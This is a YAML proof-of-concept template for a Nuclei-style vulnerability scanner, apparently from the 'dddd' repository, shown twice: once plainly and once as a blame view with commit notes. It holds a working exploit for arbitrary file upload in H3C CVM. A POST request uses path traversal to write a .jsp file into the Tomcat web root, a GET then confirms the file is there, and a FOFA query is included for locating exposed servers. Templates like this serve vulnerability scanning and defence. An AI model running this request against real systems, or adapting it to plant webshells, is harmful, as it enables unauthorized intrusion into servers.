dddd/common/config/pocs/h3c-cvm-arbitrary-file-upload.yaml

id: h3c-cvm-arbitrary-file-upload

info:
  name: H3C CVM - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
    - https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py
  metadata:
    verified: true
    max-request: 2
    fofa-query: server="H3C-CVM"
  tags: h3c,lfi,instrusive,file-upload,intrusive
variables:
  filename: "{{rand_base(5)}}"
  payload: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-10/20
        Accept-Encoding: gzip, deflate

        {{payload}}
      - |
        GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{payload}}"

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100afc1760cfa434e367bb33df7f5637dadba8e63aa69c0df3f897704c8ee24ade602200cd025b7689fc691584f540db3067bcbfcc557430f59d59d2b9b8f86b015b74c:922c64590222798bb761d5b6d8e72950
同步Nuclei_TP 9.6.2 2023-08-30 10:17:32 +02:00			`id: h3c-cvm-arbitrary-file-upload`

			`info:`
			`name: H3C CVM - Arbitrary File Upload`
			`author: SleepingBag945`
			`severity: critical`
			`description: \|`
			`An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.`
			`reference:`
			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml`
			`- https://github.com/tr0uble-mAker/POC-bomber/blob/main/pocs/redteam/h3c_cvm_fileupload_2022.py`
			`metadata:`
			`verified: true`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00			`max-request: 2`
同步Nuclei_TP 9.6.2 2023-08-30 10:17:32 +02:00			`fofa-query: server="H3C-CVM"`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00			`tags: h3c,lfi,instrusive,file-upload,intrusive`
同步Nuclei_TP 9.6.2 2023-08-30 10:17:32 +02:00			`variables:`
			`filename: "{{rand_base(5)}}"`
			`payload: "{{rand_base(8)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{filename}}.jsp&name=222" HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-range: bytes 0-10/20`
			`Accept-Encoding: gzip, deflate`

			`{{payload}}`
			`- \|`
			`GET /cas/js/lib/buttons/{{filename}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
			`- "{{payload}}"`

			`- type: word`
			`part: header`
			`words:`
			`- "Content-Type: text/html"`

			`- type: status`
			`status:`
			`- 200`
nuclei v3.0.2 && 更新poc 2023-11-01 09:00:03 +01:00
			`# digest: 4a0a00473045022100afc1760cfa434e367bb33df7f5637dadba8e63aa69c0df3f897704c8ee24ade602200cd025b7689fc691584f540db3067bcbfcc557430f59d59d2b9b8f86b015b74c:922c64590222798bb761d5b6d8e72950`